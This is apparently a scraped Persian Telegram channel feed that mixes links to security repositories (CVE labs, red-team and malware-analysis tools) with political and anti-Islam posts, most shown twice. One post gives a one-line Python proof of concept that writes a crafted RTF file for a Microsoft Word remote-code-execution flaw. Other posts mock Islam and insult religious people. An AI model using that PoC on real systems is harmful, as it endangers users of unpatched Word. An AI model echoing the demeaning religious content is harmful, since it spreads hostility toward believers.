#Red_Team
برخی از نوشته های آموزشی HTB، THM، Red Team
https://github.com/opabravo/security-writeups
@PfkSecurity
@BlueRedTeam
برخی از نوشته های آموزشی HTB، THM، Red Team
https://github.com/opabravo/security-writeups
@PfkSecurity
@BlueRedTeam
GitHub
GitHub - opabravo/security-writeups: Some HTB, THM, CTF, Penetration Testing, cyber security related resource and writeups
Some HTB, THM, CTF, Penetration Testing, cyber security related resource and writeups - opabravo/security-writeups
#Command_Injection
CVE-2019-15588 :
RCE Command Injection آسیب پذیری
https://github.com/lyy289065406/CVE-2019-15588
#CVE
@PfkSecurity
CVE-2019-15588 :
RCE Command Injection آسیب پذیری
https://github.com/lyy289065406/CVE-2019-15588
#CVE
@PfkSecurity
GitHub
GitHub - EXP-Docs/CVE-2019-15588: CVE-2019-15588 靶场: RCE 命令注入漏洞
CVE-2019-15588 靶场: RCE 命令注入漏洞. Contribute to EXP-Docs/CVE-2019-15588 development by creating an account on GitHub.
CVE-2020-13933 Shiro Authentication Bypass Vulnerability
https://github.com/lyy289065406/CVE-2020-13933
#CVE #Bypass
@PfkSecurity
https://github.com/lyy289065406/CVE-2020-13933
#CVE #Bypass
@PfkSecurity
GitHub
GitHub - EXP-Docs/CVE-2020-13933: CVE-2020-13933 靶场: shiro 认证绕过漏洞
CVE-2020-13933 靶场: shiro 认证绕过漏洞. Contribute to EXP-Docs/CVE-2020-13933 development by creating an account on GitHub.
#Red_Team
مجموعه ای از OPSEC Tradecraft و TTP برای عملیات تیم قرمز
https://github.com/hack-with-ethics/dns-recon-dns-redTeaming
@PfkSecurity
@BlueRedTeam
مجموعه ای از OPSEC Tradecraft و TTP برای عملیات تیم قرمز
https://github.com/hack-with-ethics/dns-recon-dns-redTeaming
@PfkSecurity
@BlueRedTeam
GitHub
GitHub - hack-with-ethics/dns-recon-dns-redTeaming: This is a Python script that provides the ability to perform: Check all NS…
This is a Python script that provides the ability to perform: Check all NS Records for Zone Transfers. Enumerate General DNS Records for a given Domain (MX, SOA, NS, A, AAAA, SPF and TXT). Perform ...
امنیت وب و باینری، تست نفوذ، استخراج آسیب پذیری، یادداشت های مطالعه امنیتی کنترل صنعتی
https://github.com/SurrealSky/web_security
#web
@pfksecurity
https://github.com/SurrealSky/web_security
#web
@pfksecurity
GitHub
GitHub - SurrealSky/web_security: web以及二进制安全,渗透测试,漏洞挖掘,工控安全学习笔记
web以及二进制安全,渗透测试,漏洞挖掘,工控安全学习笔记. Contribute to SurrealSky/web_security development by creating an account on GitHub.
درودی دوباره بر میهن پرستان
غمگینانه در ۹ اسفند ۱۴۰۱ استاد سید جواد طباطبایی در بیمارستان لس آنجلس درگذشت.
ایشان یکی از بزرگان اندیشه ایرانشهری و همچنین متفکر سیاسی ایرانگرایی بود که با جریانات پان از جمله پان ترکیسم بسیار مقابله کرد و جمله مشهور ((پان ترکیسم ملغمه ای از بیشعوری است)) از ایشان است
این بزرگمرد خودش اهل آذربایجان و از شهر تبریز هست،که برای ایرانیان و آذری های ایران افتخار آفرینی کرده است
یاد و روانت انوشه و گرامی باد
@pfksecurity
غمگینانه در ۹ اسفند ۱۴۰۱ استاد سید جواد طباطبایی در بیمارستان لس آنجلس درگذشت.
ایشان یکی از بزرگان اندیشه ایرانشهری و همچنین متفکر سیاسی ایرانگرایی بود که با جریانات پان از جمله پان ترکیسم بسیار مقابله کرد و جمله مشهور ((پان ترکیسم ملغمه ای از بیشعوری است)) از ایشان است
این بزرگمرد خودش اهل آذربایجان و از شهر تبریز هست،که برای ایرانیان و آذری های ایران افتخار آفرینی کرده است
یاد و روانت انوشه و گرامی باد
@pfksecurity
کار دشمن هست ولی این گازها به نوعی هوشمند هستند که در حوزههای علمیه و مدارس مذهبی عمل نمیکنند!
دشمن چرا آخوند نمیزنه؟؟ پس یا دشمن با شماست که حوزه گاوداری آخوند رو نمیزنه، یا شما خودتون میزنین و میندازین گردن دشمن...
عرزشی ناموس به خطا خودت چی فکر میکنی؟ گرچه مغزی تعطیل هستین.
#نه_به_اسلام
@PfkSecurity
دشمن چرا آخوند نمیزنه؟؟ پس یا دشمن با شماست که حوزه گاوداری آخوند رو نمیزنه، یا شما خودتون میزنین و میندازین گردن دشمن...
عرزشی ناموس به خطا خودت چی فکر میکنی؟ گرچه مغزی تعطیل هستین.
#نه_به_اسلام
@PfkSecurity
brc4
Unpack Brute Ratel (BRC4) مرحلهگر و پیکربندی استخراج نیز سعی میکند در صورت پیکربندی رمزگذاریشده، کلید rc4 را پیدا کند.
https://github.com/matthw/malware_analysis/tree/main/brc4
#Malware
@PfkSecurity
Unpack Brute Ratel (BRC4) مرحلهگر و پیکربندی استخراج نیز سعی میکند در صورت پیکربندی رمزگذاریشده، کلید rc4 را پیدا کند.
https://github.com/matthw/malware_analysis/tree/main/brc4
#Malware
@PfkSecurity
GitHub
malware_analysis/brc4 at main · matthw/malware_analysis
Contribute to matthw/malware_analysis development by creating an account on GitHub.
▪️ادعاى عدالت على و فرزندانش، مضحك و متناقض
پس از ضربه كارى و كشنده ابن ملجم بر سر على(نماد جهل و توحش)
فرزندان او قاتل را تكه تكه كرده و به آتش ميكشند.
▪️سئوال:
#الف: مگر فرزندان على قاضى بودند؟
#ب: مگر فرزندان على خليفه وقت بودند؟
#ج: چرا خود على قبل از مرگش براى ضارب حكم صادر ميكند؟
#ح: مگر على قاضى وقت بود؟
#خ: چرا قاتل را نزد قاضى نبردند و بدون هيچ دادگاهى حكم صادر كردند؟
نحوه كشتن ابن ملجم را در کانال قرار میدهم.
▪️ميتوانيم بيش از صد سئوال در مورد اين اتفاق بپرسيم كه شيعيان هيچ پاسخ عاقلانه و منطقى براى آنها ندارند.
اين هم عدالتى است كه على و فرزندانش ميخواستند در جامعه پياده كنند.
اعراب اين خانواده را خوب ميشناختند و به همين دليل به آنها هيچ وقعى نگذاشته و از آنها دورى ميكردند.
#نه_به_اسلام
@pfksecurity
پس از ضربه كارى و كشنده ابن ملجم بر سر على(نماد جهل و توحش)
فرزندان او قاتل را تكه تكه كرده و به آتش ميكشند.
▪️سئوال:
#الف: مگر فرزندان على قاضى بودند؟
#ب: مگر فرزندان على خليفه وقت بودند؟
#ج: چرا خود على قبل از مرگش براى ضارب حكم صادر ميكند؟
#ح: مگر على قاضى وقت بود؟
#خ: چرا قاتل را نزد قاضى نبردند و بدون هيچ دادگاهى حكم صادر كردند؟
نحوه كشتن ابن ملجم را در کانال قرار میدهم
▪️ميتوانيم بيش از صد سئوال در مورد اين اتفاق بپرسيم كه شيعيان هيچ پاسخ عاقلانه و منطقى براى آنها ندارند.
اين هم عدالتى است كه على و فرزندانش ميخواستند در جامعه پياده كنند.
اعراب اين خانواده را خوب ميشناختند و به همين دليل به آنها هيچ وقعى نگذاشته و از آنها دورى ميكردند.
#نه_به_اسلام
@pfksecurity
🔶 رضا حاجیلو:
«سهم استان کردستان در اقتصاد ایران کمتر از یک درصد است.
با وجود سطح اتحاد علیه ج.ا. و سازماندهیای که مردم کردستان دارند،
ج.ا. از همان سال ۵۷ مجبور بود قصدا مانع توسعه و صنعتیسازی این استان شود
و به وسیلهی پروپاگاندا تصویرها و شایعههای نادرستی بِپَراکَنَدْ.
تصور کنید این ۵٪ درصد از اقتصاد ایران در این استان بود، چه بلایی به سر ج.ا. میآمد؟»
@pfksecurity
«سهم استان کردستان در اقتصاد ایران کمتر از یک درصد است.
با وجود سطح اتحاد علیه ج.ا. و سازماندهیای که مردم کردستان دارند،
ج.ا. از همان سال ۵۷ مجبور بود قصدا مانع توسعه و صنعتیسازی این استان شود
و به وسیلهی پروپاگاندا تصویرها و شایعههای نادرستی بِپَراکَنَدْ.
تصور کنید این ۵٪ درصد از اقتصاد ایران در این استان بود، چه بلایی به سر ج.ا. میآمد؟»
@pfksecurity
CVE-2023-21716(Microsoft Word RCE vuln) Python PoC
open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
#CVE
@PfkSecurityتوافق رژیم با آل سعود
آزادی سازی ۵۰۰میلیون دلار از بدهی عراق
عدم صدور قطعنامه در آژانس
استقبال امارات از توافق
احیای لاشه ی برجام
یک نتیجه دارد :
رژیم برای ما لات است و برای جهان شکلات
چین با عربستان و ایران قراردادهای نجومی و بلند مدت دارد و بدون روابط حسنه این ۲ نمیتوانست وارد این تجارت شود .
@PfkSecurity
آزادی سازی ۵۰۰میلیون دلار از بدهی عراق
عدم صدور قطعنامه در آژانس
استقبال امارات از توافق
احیای لاشه ی برجام
یک نتیجه دارد :
رژیم برای ما لات است و برای جهان شکلات
چین با عربستان و ایران قراردادهای نجومی و بلند مدت دارد و بدون روابط حسنه این ۲ نمیتوانست وارد این تجارت شود .
@PfkSecurity
(الله دزد)
الله خودش پول چاپ نکرده و نمیکنه
فقط دارایی یه عده را میگیره میده به یه عده دیگه
حالا جامعه خودمون را نگاه کنید ببینید که این الله دزد اسلام از کی گرفته و به کی بخشیده
زنده یاد دکتر جمشیدی🥀
#نه_به_اسلام
@pfksecurity
الله خودش پول چاپ نکرده و نمیکنه
فقط دارایی یه عده را میگیره میده به یه عده دیگه
حالا جامعه خودمون را نگاه کنید ببینید که این الله دزد اسلام از کی گرفته و به کی بخشیده
زنده یاد دکتر جمشیدی🥀
#نه_به_اسلام
@pfksecurity
شناسایی گروه های APT به احتمال زیاد مسئول یک حادثه امنیت سایبری از تکنیک های MITER ATT&CK در گزارش حادثه حادثه
https://gitlab.com/bontchev/whodunit
#APT
@PfkSecurity
https://gitlab.com/bontchev/whodunit
#APT
@PfkSecurity
GitLab
Vesselin Bontchev / whodunit · GitLab
Recognizing the most likely APT groups responsible for an incident